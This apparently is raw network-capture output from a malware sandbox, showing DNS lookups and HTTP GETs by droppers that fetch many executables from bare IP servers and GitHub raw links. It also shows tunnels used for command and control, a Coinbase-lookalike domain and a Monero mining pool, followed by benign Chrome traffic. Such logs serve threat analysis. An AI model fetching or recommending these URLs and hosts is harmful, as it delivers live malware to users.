IN A

104.26.15.227

xanaxspoofer.com

IN A

172.67.71.136
GET

http://45.43.36.223/m/mode11_UVo6.exe

Request

GET /m/mode11_UVo6.exe HTTP/1.1
Host: 45.43.36.223
Connection: Keep-Alive

Response

HTTP/1.0 200 OK

Server: SimpleHTTP/0.6 Python/3.12.8
Date: Mon, 13 Jan 2025 18:10:43 GMT
Content-type: application/x-msdos-program
Content-Length: 3900416
Last-Modified: Sat, 28 Dec 2024 12:03:02 GMT
DNS

dns.google

Request

dns.google

IN A

Response

dns.google

IN A

8.8.4.4

dns.google

IN A

8.8.8.8
DNS

136.71.67.172.in-addr.arpa

Request

136.71.67.172.in-addr.arpa

IN PTR

Response
DNS

136.71.67.172.in-addr.arpa

Request

136.71.67.172.in-addr.arpa

IN PTR

Response
GET

http://45.43.36.223/m/mode11_0HVJ.exe

Request

GET /m/mode11_0HVJ.exe HTTP/1.1
Host: 45.43.36.223
Connection: Keep-Alive

Response

HTTP/1.0 200 OK

Server: SimpleHTTP/0.6 Python/3.12.8
Date: Mon, 13 Jan 2025 18:10:44 GMT
Content-type: application/x-msdos-program
Content-Length: 4929024
Last-Modified: Sat, 28 Dec 2024 12:03:02 GMT
GET

http://45.43.36.223/m/mode11_CBNx.exe

Request

GET /m/mode11_CBNx.exe HTTP/1.1
Host: 45.43.36.223
Connection: Keep-Alive

Response

HTTP/1.0 200 OK

Server: SimpleHTTP/0.6 Python/3.12.8
Date: Mon, 13 Jan 2025 18:10:44 GMT
Content-type: application/x-msdos-program
Content-Length: 5827584
Last-Modified: Sat, 28 Dec 2024 12:03:02 GMT
GET

http://45.43.36.223/m/mode11_AKUh.exe

Request

GET /m/mode11_AKUh.exe HTTP/1.1
Host: 45.43.36.223
Connection: Keep-Alive

Response

HTTP/1.0 200 OK

Server: SimpleHTTP/0.6 Python/3.12.8
Date: Mon, 13 Jan 2025 18:10:44 GMT
Content-type: application/x-msdos-program
Content-Length: 4936192
Last-Modified: Sat, 28 Dec 2024 12:03:02 GMT
DNS

4.4.8.8.in-addr.arpa

Request

4.4.8.8.in-addr.arpa

IN PTR

Response

4.4.8.8.in-addr.arpa

IN PTR

dnsgoogle
DNS

nav.smartscreen.microsoft.com

Request

nav.smartscreen.microsoft.com

IN A

Response

nav.smartscreen.microsoft.com

IN CNAME

prod-atm-wds-nav.trafficmanager.net

prod-atm-wds-nav.trafficmanager.net

IN CNAME

prod-agic-us-3.uksouth.cloudapp.azure.com

prod-agic-us-3.uksouth.cloudapp.azure.com

IN A

172.165.61.93
DNS

93.61.165.172.in-addr.arpa

Request

93.61.165.172.in-addr.arpa

IN PTR

Response
DNS

rappel-coinbase.com

Request

rappel-coinbase.com

IN A

Response

rappel-coinbase.com

IN A

91.202.233.151
DNS

rappel-coinbase.com

Request

rappel-coinbase.com

IN A

Response

rappel-coinbase.com

IN A

91.202.233.151
DNS

223.36.43.45.in-addr.arpa

Request

223.36.43.45.in-addr.arpa

IN PTR

Response
DNS

223.36.43.45.in-addr.arpa

Request

223.36.43.45.in-addr.arpa

IN PTR

Response
GET

http://45.43.36.223/m/mode11_N1Fz.exe

Request

GET /m/mode11_N1Fz.exe HTTP/1.1
Host: 45.43.36.223
Connection: Keep-Alive

Response

HTTP/1.0 200 OK

Server: SimpleHTTP/0.6 Python/3.12.8
Date: Mon, 13 Jan 2025 18:10:47 GMT
Content-type: application/x-msdos-program
Content-Length: 4033024
Last-Modified: Sat, 28 Dec 2024 12:03:01 GMT
DNS

Extazz24535-22930.portmap.host

Request

Extazz24535-22930.portmap.host

IN A

Response
DNS

Extazz24535-22930.portmap.host

Request

Extazz24535-22930.portmap.host

IN A

Response
GET

http://45.43.36.223/m/mode11_6dMu.exe

Request

GET /m/mode11_6dMu.exe HTTP/1.1
Host: 45.43.36.223
Connection: Keep-Alive

Response

HTTP/1.0 200 OK

Server: SimpleHTTP/0.6 Python/3.12.8
Date: Mon, 13 Jan 2025 18:10:55 GMT
Content-type: application/x-msdos-program
Content-Length: 4679680
Last-Modified: Sat, 28 Dec 2024 12:03:02 GMT
GET

http://147.124.216.113/image.exe

Request

GET /image.exe HTTP/1.1
Host: 147.124.216.113
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Content-Type: application/octet-stream
Last-Modified: Tue, 07 Jan 2025 08:16:47 GMT
Accept-Ranges: bytes
ETag: "65d1a17edc60db1:0"
Server: Microsoft-IIS/8.5
Date: Mon, 13 Jan 2025 18:11:00 GMT
Content-Length: 1161216
GET

http://45.141.26.234/Java32.exe

Request

GET /Java32.exe HTTP/1.1
Host: 45.141.26.234
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Date: Mon, 13 Jan 2025 18:11:03 GMT
Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
Last-Modified: Mon, 23 Dec 2024 14:12:24 GMT
ETag: "1a600-629f095e70c0a"
Accept-Ranges: bytes
Content-Length: 108032
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/x-msdownload
GET

http://45.141.26.234/XClient.exe

Request

GET /XClient.exe HTTP/1.1
Host: 45.141.26.234
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Date: Mon, 13 Jan 2025 18:11:06 GMT
Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
Last-Modified: Wed, 01 Jan 2025 17:33:15 GMT
ETag: "a600-62aa870cdaba5"
Accept-Ranges: bytes
Content-Length: 42496
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/x-msdownload
DNS

6.tcp.eu.ngrok.io

Request

6.tcp.eu.ngrok.io

IN A

Response

6.tcp.eu.ngrok.io

IN A

52.28.247.255

151.101.194.49:443

https://urlhaus.abuse.ch/downloads/text_online/

tls, http

._cache_New Text Document mod.exe

11.6kB
661.4kB
245
482

HTTP Request

GET https://urlhaus.abuse.ch/downloads/text_online/

HTTP Response

200
185.199.111.133:443

https://raw.githubusercontent.com/andresberejno/aaaaaaa/refs/heads/main/Client-base.exe

tls, http

._cache_New Text Document mod.exe

70.2kB
3.4MB
1390
2424

HTTP Request

GET https://raw.githubusercontent.com/andresberejno/aaaaaaa/refs/heads/main/Client-base.exe

HTTP Response

200
151.101.194.49:443

https://urlhaus.abuse.ch/downloads/text_online/

tls, http

._cache_Synaptics.exe

16.8kB
661.1kB
302
483

HTTP Request

GET https://urlhaus.abuse.ch/downloads/text_online/

HTTP Response

200
185.199.111.133:443

https://raw.githubusercontent.com/dzonicar12332/voidddwareee/refs/heads/main/voidware_loader.exe

tls, http

._cache_Synaptics.exe

57.2kB
3.4MB
1230
2424

HTTP Request

GET https://raw.githubusercontent.com/dzonicar12332/voidddwareee/refs/heads/main/voidware_loader.exe

HTTP Response

200
195.177.92.88:80

http://195.177.92.88/build.exe

http

._cache_New Text Document mod.exe

5.5kB
317.1kB
119
229

HTTP Request

GET http://195.177.92.88/build.exe

HTTP Response

200
106.53.83.169:80

._cache_New Text Document mod.exe

260 B
5
66.63.187.250:80

http://66.63.187.250/zmk/gem2.exe

http

._cache_Synaptics.exe

60.3kB
3.0MB
1232
2126

HTTP Request

GET http://66.63.187.250/zmk/gem2.exe

HTTP Response

200
13.127.206.16:14296

0.tcp.in.ngrok.io

Client-base.exe

260 B
200 B
5
5
195.177.92.88:1912

build.exe

2.7MB
26.7kB
1946
506
151.101.194.49:443

https://urlhaus.abuse.ch/downloads/text_online/

tls, http

._cache_New Text Document mod.exe

15.4kB
661.1kB
298
483

HTTP Request

GET https://urlhaus.abuse.ch/downloads/text_online/

HTTP Response

200
66.63.187.250:80

http://66.63.187.250/zmk/gem1.exe

http

._cache_New Text Document mod.exe

27.7kB
1.3MB
561
900

HTTP Request

GET http://66.63.187.250/zmk/gem1.exe

HTTP Response

200
147.185.221.25:11758

other-little.gl.at.ply.gg

DirectX111.exe

260 B
5
185.215.113.16:80

._cache_Synaptics.exe

260 B
5
69.42.215.252:80

http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978

http

Synaptics.exe

752 B
415 B
13
4

HTTP Request

GET http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978

HTTP Response

200
185.215.113.16:80

._cache_New Text Document mod.exe

260 B
5
66.63.187.173:15666

gem1.exe

19.9MB
267.5kB
14287
6377
104.26.13.205:443

api.ipify.org

tls

gem1.exe

919 B
4.4kB
10
8
142.250.178.3:80

http://c.pki.goog/r/r4.crl

http

gem1.exe

556 B
3.8kB
7
5

HTTP Request

GET http://c.pki.goog/r/gsr1.crl

HTTP Response

200

HTTP Request

GET http://c.pki.goog/r/r4.crl

HTTP Response

200
13.127.206.16:14296

0.tcp.in.ngrok.io

Client-base.exe

260 B
200 B
5
5
142.250.187.196:443

https://www.google.com/sorry/index?continue=https://www.google.com/async/ddljson%3Fasync%3Dntp:2&q=EgS117BTGL2qlbwGIjAywPlHI8oZdjf7SJq5G05XJVqGN7daqF8RZoGEPF6RngOg_64BHiwVryU59DQZH3kyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM

tls, http2

chrome.exe

2.6kB
13.6kB
25
33

HTTP Request

GET https://www.google.com/async/ddljson?async=ntp:2

HTTP Request

GET https://www.google.com/async/newtab_ogb?hl=en-US&async=fixed:0

HTTP Request

GET https://www.google.com/async/newtab_promos

HTTP Request

GET https://www.google.com/sorry/index?continue=https://www.google.com/async/ddljson%3Fasync%3Dntp:2&q=EgS117BTGL2qlbwGIjAywPlHI8oZdjf7SJq5G05XJVqGN7daqF8RZoGEPF6RngOg_64BHiwVryU59DQZH3kyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM

HTTP Response

429
142.250.187.196:443

https://www.google.com/sorry/index?continue=https://www.google.com/async/ddljson%3Fasync%3Dntp:2&q=EgS117BTGMGqlbwGIjD0H-Qku2yUBX6Y8K7YBcFOiToynwizSizs2JPcixPGNSkgcORZjWt1sQvDkZmECl8yAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM

tls, http2

chrome.exe

3.1kB
17.2kB
30
39

HTTP Request

GET https://www.google.com/async/ddljson?async=ntp:2

HTTP Request

GET https://www.google.com/async/newtab_ogb?hl=en-US&async=fixed:0

HTTP Request

GET https://www.google.com/async/newtab_promos

HTTP Request

GET https://www.google.com/sorry/index?continue=https://www.google.com/async/newtab_promos&q=EgS117BTGMGqlbwGIjCDdTCTwFVQ-0CLtN9tWcRSdDA8kvKNt9opipeJDt2yLJk6TJJjvQOeEYrDdi0GilsyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM

HTTP Response

429

HTTP Request

GET https://www.google.com/sorry/index?continue=https://www.google.com/async/ddljson%3Fasync%3Dntp:2&q=EgS117BTGMGqlbwGIjD0H-Qku2yUBX6Y8K7YBcFOiToynwizSizs2JPcixPGNSkgcORZjWt1sQvDkZmECl8yAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM
13.127.206.16:14296

0.tcp.in.ngrok.io

Client-base.exe

260 B
200 B
5
5
142.250.187.238:443

https://clients2.google.com/service/update2/crx?os=win&arch=x64&os_arch=x86_64&nacl_arch=x86-64&prod=chromecrx&prodchannel=&prodversion=123.0.6312.123&lang=en-US&acceptformat=crx3,puff&x=id%3Dghbmnnjooekpmoecnnnilnnbdlolhkhi%26v%3D1.82.1%26installsource%3Dnotfromwebstore%26installedby%3Dexternal%26uc%26ping%3Dr%253D98%2526e%253D1&x=id%3Dnmmhkkegccagdldgiimedpiccmgmieda%26v%3D1.0.0.6%26installsource%3Dnotfromwebstore%26installedby%3Dother%26uc%26ping%3Dr%253D98%2526e%253D1

tls, http2

chrome.exe

2.2kB
9.8kB
16
17

HTTP Request

GET https://clients2.google.com/service/update2/crx?os=win&arch=x64&os_arch=x86_64&nacl_arch=x86-64&prod=chromecrx&prodchannel=&prodversion=123.0.6312.123&lang=en-US&acceptformat=crx3,puff&x=id%3Dghbmnnjooekpmoecnnnilnnbdlolhkhi%26v%3D1.82.1%26installsource%3Dnotfromwebstore%26installedby%3Dexternal%26uc%26ping%3Dr%253D98%2526e%253D1&x=id%3Dnmmhkkegccagdldgiimedpiccmgmieda%26v%3D1.0.0.6%26installsource%3Dnotfromwebstore%26installedby%3Dother%26uc%26ping%3Dr%253D98%2526e%253D1
142.250.200.33:443

https://clients2.googleusercontent.com/crx/blobs/AcmIXbpGoRruM6Rg2pdHIUfNGnvAwJcqpFoWJV4Xd6PeYFnv5YpJ0-GVzjWL6XpCDzrg9cVo2bTwfPVau85UdyeFfZQe-rOdS7oyguq-391NmfeQd9WZZkjpgIbL1I5KKEcAxlKa5Z8JDrufy52udyO9TokqhOw4Sbnj/GHBMNNJOOEKPMOECNNNILNNBDLOLHKHI_1_85_1_0.crx

tls, http2

chrome.exe

4.8kB
173.1kB
80
130

HTTP Request

GET https://clients2.googleusercontent.com/crx/blobs/AcmIXbpGoRruM6Rg2pdHIUfNGnvAwJcqpFoWJV4Xd6PeYFnv5YpJ0-GVzjWL6XpCDzrg9cVo2bTwfPVau85UdyeFfZQe-rOdS7oyguq-391NmfeQd9WZZkjpgIbL1I5KKEcAxlKa5Z8JDrufy52udyO9TokqhOw4Sbnj/GHBMNNJOOEKPMOECNNNILNNBDLOLHKHI_1_85_1_0.crx
13.127.206.16:14296

0.tcp.in.ngrok.io

Client-base.exe

260 B
200 B
5
5
185.215.113.16:80

._cache_New Text Document mod.exe

260 B
5
141.94.96.195:80

pool.supportxmr.com

http

dialer.exe

3.2kB
23.8kB
56
55
185.215.113.16:80

._cache_Synaptics.exe

260 B
5
31.41.244.11:80

._cache_New Text Document mod.exe

260 B
5
172.217.169.78:443

drive.google.com

tls, http2

chrome.exe

1.1kB
8.1kB
9
9
172.217.169.78:443

https://drive.google.com/

tls, http2

chrome.exe

2.3kB
10.0kB
16
16

HTTP Request

GET https://drive.google.com/
142.251.173.84:443

https://accounts.google.com/InteractiveLogin?continue=https://drive.google.com/drive/?dmr%3D1%26ec%3Dwgc-drive-globalnav-goto&followup=https://drive.google.com/drive/?dmr%3D1%26ec%3Dwgc-drive-globalnav-goto&osid=1&passive=1209600&service=wise&ifkv=AVdkyDnaxoWZG4OR-vMlB1KbQquaGFXzgaZSh30TRObTsdv0L7xCHI9egjANw6Paetc4DxzUgI4w

tls, http2

chrome.exe

3.9kB
9.6kB
23
25

HTTP Request

GET https://accounts.google.com/ServiceLogin?service=wise&passive=1209600&osid=1&continue=https://drive.google.com/&followup=https://drive.google.com/&emr=1

HTTP Request

GET https://accounts.google.com/ServiceLogin?service=wise&passive=1209600&osid=1&continue=https://drive.google.com/drive/?dmr%3D1%26ec%3Dwgc-drive-globalnav-goto&followup=https://drive.google.com/drive/?dmr%3D1%26ec%3Dwgc-drive-globalnav-goto

HTTP Request

GET https://accounts.google.com/InteractiveLogin?continue=https://drive.google.com/drive/?dmr%3D1%26ec%3Dwgc-drive-globalnav-goto&followup=https://drive.google.com/drive/?dmr%3D1%26ec%3Dwgc-drive-globalnav-goto&osid=1&passive=1209600&service=wise&ifkv=AVdkyDnaxoWZG4OR-vMlB1KbQquaGFXzgaZSh30TRObTsdv0L7xCHI9egjANw6Paetc4DxzUgI4w
142.250.200.46:443

https://workspace.google.com/assets/f8727730.min.js

tls, http2

chrome.exe

9.0kB
134.8kB
121
120

HTTP Request

GET https://workspace.google.com/intl/en-US/products/drive/

HTTP Request

GET https://workspace.google.com/assets/0d962dee.css

HTTP Request

GET https://workspace.google.com/assets/426a67ed.css

HTTP Request

GET https://workspace.google.com/assets/2bbaf8c6.css

HTTP Request

GET https://workspace.google.com/assets/426a67ed2.css

HTTP Request

GET https://workspace.google.com/assets/f261be23.css

HTTP Request

GET https://workspace.google.com/assets/f1b5e532.min.js

HTTP Request

GET https://workspace.google.com/assets/80078c6d.min.js

HTTP Request

GET https://workspace.google.com/assets/a9e19642.min.js

HTTP Request

GET https://workspace.google.com/assets/c64600aa.min.js

HTTP Request

GET https://workspace.google.com/assets/cd9c842e.min.js

HTTP Request

GET https://workspace.google.com/assets/00adf923.min.js

HTTP Request

GET https://workspace.google.com/assets/5e53e9e0.min.js

HTTP Request

GET https://workspace.google.com/assets/7a4d51ed.min.js

HTTP Request

GET https://workspace.google.com/assets/197ab810.min.js

HTTP Request

GET https://workspace.google.com/assets/687e7157.min.js

HTTP Request

GET https://workspace.google.com/assets/1c6fe6ad.min.js

HTTP Request

GET https://workspace.google.com/assets/fb0914da.min.js

HTTP Request

GET https://workspace.google.com/assets/7ffa16ea.min.js

HTTP Request

GET https://workspace.google.com/assets/b59f5798.min.js

HTTP Request

GET https://workspace.google.com/assets/7ff80ebe.min.js

HTTP Request

GET https://workspace.google.com/assets/d0a0376a.min.js

HTTP Request

GET https://workspace.google.com/assets/f8727730.min.js
13.127.206.16:14296

0.tcp.in.ngrok.io

Client-base.exe

260 B
200 B
5
5
142.250.200.33:443

https://lh3.googleusercontent.com/gXQ1CySD9oW9wM2niB5c0fnbttInuG7qtUzp7oQzry-ok6hg3lMuk6z0yKJTgUd2qBGs3xJwZF64iflmj8xP8SUwOvNbLPHGICjT=e365-pa-nu-s0-rw

tls, http2

chrome.exe

117.7kB
4.2MB
2157
3037

HTTP Request

GET https://lh3.googleusercontent.com/7J-_LaRuKfDqWTv_xGtUao2gtOI7GUrr4cNcy_8cHtXpOMLFt3-VdllzAPEVC--KGilwE7pOCUI3KBRWsa_V7TCHXM0Eiqgy1H9m=e365-pa-nu-s0-rw

HTTP Request

GET https://lh3.googleusercontent.com/qSRx0MPsSqwsxnB7oa8jkMwSmA03iQcMjrmJOnmNkA4o_mA2a9Q1II6moeBU7r1ztzOXQpLnKuMhIeFPmiP46hOw728K4Aw3JY4=e365-pa-nu-rw-w1455

HTTP Request

GET https://lh3.googleusercontent.com/7J-_LaRuKfDqWTv_xGtUao2gtOI7GUrr4cNcy_8cHtXpOMLFt3-VdllzAPEVC--KGilwE7pOCUI3KBRWsa_V7TCHXM0Eiqgy1H9m=e365-pa-nu-s0-v0-rw

HTTP Request

GET https://lh3.googleusercontent.com/S26WkdqBRQZW8PC_mo5mE45tepl9xY74x1-esi0Upaey-XV0sbs4Fvt7Uq3sP5LARkSbsOwTTIjKUiXTbVtArtuP4Fg-a7v4cAVN=e365-pa-nu-s0-rw

HTTP Request

GET https://lh3.googleusercontent.com/5PYAwhP5cuGQEIi-R8V-keA4jaJZG82g8iBrKCoPKXHCP2nyyO6i6kzAH0i8MA8AVwgOAlxzcai7yKHVzVmUeHMd_FkVeQIG41s=e365-pa-nu-s0-rw

HTTP Request

GET https://lh3.googleusercontent.com/RzrCOW3W04EKFPlpQeagbcX-3FrUDfpa7qKhYBVJq0KQxjfBwoRBHGJpTWM2FAQgqioEmE5OxwLslpmuHpN-zD2mqY_AWKj95bsE

HTTP Request

GET https://lh3.googleusercontent.com/dvAfIQb0KajN6WUONfemiYUwCwrzoN7qAUsioJt2DyV1dt3LNLUmxHHvCXFHI6ZEFxjx_ClxenFxr587O36XX8a5QeUMEAS-1WJe

HTTP Request

GET https://lh3.googleusercontent.com/mFX4RtYSpBwXZXB71FNeXM6v9iEcAsCYoEWvaA0SJB_EfOi2TvXNJ455zRiaCZb-_IiTsbEDlOWQi1Y2as2t_9rzUQe6zkldGInt

HTTP Request

GET https://lh3.googleusercontent.com/S26WkdqBRQZW8PC_mo5mE45tepl9xY74x1-esi0Upaey-XV0sbs4Fvt7Uq3sP5LARkSbsOwTTIjKUiXTbVtArtuP4Fg-a7v4cAVN=e365-pa-nu-s0-v0-rw

HTTP Request

GET https://lh3.googleusercontent.com/5PYAwhP5cuGQEIi-R8V-keA4jaJZG82g8iBrKCoPKXHCP2nyyO6i6kzAH0i8MA8AVwgOAlxzcai7yKHVzVmUeHMd_FkVeQIG41s=e365-pa-nu-s0-v0-rw

HTTP Request

GET https://lh3.googleusercontent.com/qi-5khAOg8HlqE6BVJSyGuReX7cLrXx-tg_UlrLsP0sTvuIvMe2IdCenW9jL-KTjxkVf9f0ONBMOTBPE84bp-cl6PPEKhNgRzTQ=e365-pa-nu-s0-rw

HTTP Request

GET https://lh3.googleusercontent.com/luR__x3sJf7BA833oja0gDViwRv_hnYZKBEcQOo9iBu3eKttHYmktkaCRjE4ECxmzFSQTIxMoCyhRY6WwXPJvw564LfY457Eig=e365-pa-nu-s0-rw

HTTP Request

GET https://lh3.googleusercontent.com/SB__9Ik-UqlTHS9Mp0zO-QVdPPVxb3o1Ek17Z3y1Q7_rUGN0j8s-xA0rqdAXM0Mb1z3VJ8v-rDzHfDX-yLGfMxgbaKGAGHPmQZis=e365-pa-nu-s0-rw

HTTP Request

GET https://lh3.googleusercontent.com/kb_Qu0wccTbbxMVmy7WnBOrPO8taACz0oi32xRNPuBBZe4uz50DwiYufFP7S3E230TGQSEu3Nu021PDcIADDimr7HrenNYCVv_EY=e365-pa-nu-s0-rw

HTTP Request

GET https://lh3.googleusercontent.com/wePSigsq8uFv9S_k42piWs8mGFKr97FSAonu0EnxiiEim4g4n6KIGiu9o0OgbP8zq6GeJQW60MEDzWAWb5ahu9Sa0ZYUnh1fO8E=e365-pa-nu-s0-rw

HTTP Request

GET https://lh3.googleusercontent.com/I-x3e5aXGAe8z9azwZi2W1Axx1xsibQBx8TRVHhbFhRucNWn-6PngJ1BoXci_06bcmvUaVc_HLTvPsv6NiqKJq4QyuYbYfm9bj9iZA=e365-pa-nu-s0-rw

HTTP Request

GET https://lh3.googleusercontent.com/5xw2Y5jI0iz24qieD7U1ETqd1dwUZvtmZuJiGkKSQj-yEFaEVmLw6XgKXzOLon_RiX-5t3amygvXebgNN8bgyxQlO_3vhAgwpyMc=e365-pa-nu-s0-rw

HTTP Request

GET https://lh3.googleusercontent.com/gXQ1CySD9oW9wM2niB5c0fnbttInuG7qtUzp7oQzry-ok6hg3lMuk6z0yKJTgUd2qBGs3xJwZF64iflmj8xP8SUwOvNbLPHGICjT=e365-pa-nu-s0-rw
142.250.200.33:443

lh3.googleusercontent.com

tls

chrome.exe

1.2kB
9.8kB
12
10
142.250.179.251:443

https://storage.googleapis.com/assets_workspace/uploads/7uffzv9dk4sn-7LhoZoRSU32Sn20yI8213k-92d83d07ba564bddac887d329c3589c2-Vector.svg

tls, http2

chrome.exe

2.4kB
19.8kB
22
22

HTTP Request

GET https://storage.googleapis.com/assets_workspace/uploads/7uffzv9dk4sn-3652TCzauH9jaL0QJ8H6FM-bfed64c7e8da9ac20d439f436570f955-Drive_Full_Logo_2x.svg

HTTP Request

GET https://storage.googleapis.com/assets_workspace/uploads/7uffzv9dk4sn-7LhoZoRSU32Sn20yI8213k-92d83d07ba564bddac887d329c3589c2-Vector.svg
142.250.179.251:443

storage.googleapis.com

tls

chrome.exe

1.0kB
4.6kB
9
7
142.250.178.8:443

https://ssl.google-analytics.com/r/__utm.gif?utmwv=5.7.2&utms=1&utmn=226365011&utmhn=workspace.google.com&utme=8(Region*Language*Original%20URL*Country*14!uaRef)9(noram*en*workspace.google.com%2Fintl%2Fen-US%2Fproducts%2Fdrive%2F*us*14!val%3A)11(2*2*4!2)&utmcs=UTF-8&utmsr=1280x720&utmvp=1263x585&utmsc=24-bit&utmul=en-us&utmje=0&utmfl=-&utmdt=Google%20Drive%3A%20Share%20Files%20Online%20with%20Secure%20Cloud%20Storage%20%7C%20Google%20Workspace&utmhid=2053226132&utmr=-&utmp=us%3A%2Fintl%2Fen-US%2Fproducts%2Fdrive%2F%3Fchannel%3D%26e%3D&utmht=1736791374540&utmac=UA-18073-1&utmgtm=45He5190n51Q4J6v595350za200&utmcc=__utma%3D61317162.1091814047.1736791374.1736791374.1736791374.1%3B%2B__utmz%3D61317162.1736791374.1.1.utmcsr%3D(direct)%7Cutmccn%3D(direct)%7Cutmcmd%3D(none)%3B&aip=1&utmjid=1588573506&utmredir=1&utmmt=1&utmu=q_CgACBAAAGBAAAAAgAAAAAE~

tls, http2

chrome.exe

3.1kB
25.8kB
27
31

HTTP Request

GET https://ssl.google-analytics.com/ga.js

HTTP Request

GET https://ssl.google-analytics.com/r/__utm.gif?utmwv=5.7.2&utms=1&utmn=226365011&utmhn=workspace.google.com&utme=8(Region*Language*Original%20URL*Country*14!uaRef)9(noram*en*workspace.google.com%2Fintl%2Fen-US%2Fproducts%2Fdrive%2F*us*14!val%3A)11(2*2*4!2)&utmcs=UTF-8&utmsr=1280x720&utmvp=1263x585&utmsc=24-bit&utmul=en-us&utmje=0&utmfl=-&utmdt=Google%20Drive%3A%20Share%20Files%20Online%20with%20Secure%20Cloud%20Storage%20%7C%20Google%20Workspace&utmhid=2053226132&utmr=-&utmp=us%3A%2Fintl%2Fen-US%2Fproducts%2Fdrive%2F%3Fchannel%3D%26e%3D&utmht=1736791374540&utmac=UA-18073-1&utmgtm=45He5190n51Q4J6v595350za200&utmcc=__utma%3D61317162.1091814047.1736791374.1736791374.1736791374.1%3B%2B__utmz%3D61317162.1736791374.1.1.utmcsr%3D(direct)%7Cutmccn%3D(direct)%7Cutmcmd%3D(none)%3B&aip=1&utmjid=1588573506&utmredir=1&utmmt=1&utmu=q_CgACBAAAGBAAAAAgAAAAAE~
142.250.187.202:443

https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTIzLjAuNjMxMi4xMjMSJwmA6QC9dWevzxIFDRkBE_oSBQ3oIX6GEgUN05ioByHKFf2CpcjaZw==?alt=proto

tls, http2

chrome.exe

2.1kB
7.1kB
17
19

HTTP Request

GET https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTIzLjAuNjMxMi4xMjMSIAmQPV0x4uaegxIFDQ-obAwSBQ3-OcPhIWJhcZEEvqEs?alt=proto

HTTP Request

GET https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTIzLjAuNjMxMi4xMjMSJwmA6QC9dWevzxIFDRkBE_oSBQ3oIX6GEgUN05ioByHKFf2CpcjaZw==?alt=proto
147.185.221.25:11758

other-little.gl.at.ply.gg

DirectX111.exe

260 B
5
216.239.34.36:443

https://region1.google-analytics.com/g/collect?v=2&tid=G-FWCBRW1RY8&gtm=45je5190v886057375z8595350za200zb595350&_p=1736791373704&gcs=G101&gcd=13q3r3l3l5l1&npa=0&dma=0&tag_exp=101925629~102067555~102067808~102081485~102198178&ul=en&cid=1332354461.1736791375&sr=1280x720&_ng=1&ir=1&uaa=x86&uab=64&uafvl=Google%2520Chrome%3B123.0.6312.123%7CNot%253AA-Brand%3B8.0.0.0%7CChromium%3B123.0.6312.123&uamb=0&uam=&uap=Windows&uapv=14.0.0&uaw=0&frm=0&pscdl=denied&_eu=EA&_s=2&dl=https%3A%2F%2Fworkspacegoogle.com%2Fus%3A%2Fintl%2Fen-US%2Fproducts%2Fdrive%2F&dp=us%3A%2Fintl%2Fen-US%2Fproducts%2Fdrive%2F&sid=1736791374&sct=1&seg=0&dt=Google%20Drive%3A%20Share%20Files%20Online%20with%20Secure%20Cloud%20Storage%20%7C%20Google%20Workspace&en=auto_track_event&_c=1&ep.region=noram&ep.original_url=workspace.google.com%2Fintl%2Fen-US%2Fproducts%2Fdrive%2F&ep.cs_employee_count=&ep.concatenated_exids=(not%20set)&ep.apps_marketing_signals_cookie=source%3D%26lastExperiment%3D%26allExperiments%3D&ep.cs_industry=&ep.cs_formid=33&ep.locale=en_us&ep.resolution=1280x672&ep.is_rivendell=true&ep.is_eea=false&ep.event_category=drive%3A%20global%20nav&ep.event_action=sign%20in&ep.event_label=https%3A%2F%2Fdrive.google.com%2Fdrive%2F%3Fdmr%3D1%26ec%3Dwgc-drive-globalnav-goto&ep.data_g_metadata=na&_et=1476&tfd=3359

tls, http2

chrome.exe

3.8kB
7.4kB
17
18

HTTP Request

POST https://region1.google-analytics.com/g/collect?v=2&tid=G-FWCBRW1RY8&gtm=45je5190v886057375z8595350za200zb595350&_p=1736791373704&gcs=G101&gcd=13q3r3l3l5l1&npa=0&dma=0&tag_exp=101925629~102067555~102067808~102081485~102198178&ul=en&cid=1332354461.1736791375&sr=1280x720&_ng=1&ir=1&uaa=x86&uab=64&uafvl=Google%2520Chrome%3B123.0.6312.123%7CNot%253AA-Brand%3B8.0.0.0%7CChromium%3B123.0.6312.123&uamb=0&uam=&uap=Windows&uapv=14.0.0&uaw=0&frm=0&pscdl=denied&_eu=EA&_s=1&dl=https%3A%2F%2Fworkspacegoogle.com%2Fus%3A%2Fintl%2Fen-US%2Fproducts%2Fdrive%2F&dp=us%3A%2Fintl%2Fen-US%2Fproducts%2Fdrive%2F&sid=1736791374&sct=1&seg=0&dt=Google%20Drive%3A%20Share%20Files%20Online%20with%20Secure%20Cloud%20Storage%20%7C%20Google%20Workspace&en=page_view&_fv=1&_nsi=1&_ss=1&_c=1&ep.region=noram&ep.original_url=workspace.google.com%2Fintl%2Fen-US%2Fproducts%2Fdrive%2F&ep.cs_employee_count=&ep.concatenated_exids=(not%20set)&ep.apps_marketing_signals_cookie=source%3D%26lastExperiment%3D%26allExperiments%3D&ep.cs_industry=&ep.cs_formid=33&ep.locale=en_us&ep.resolution=1280x672&ep.is_rivendell=true&ep.is_eea=false&tfd=1881

HTTP Request

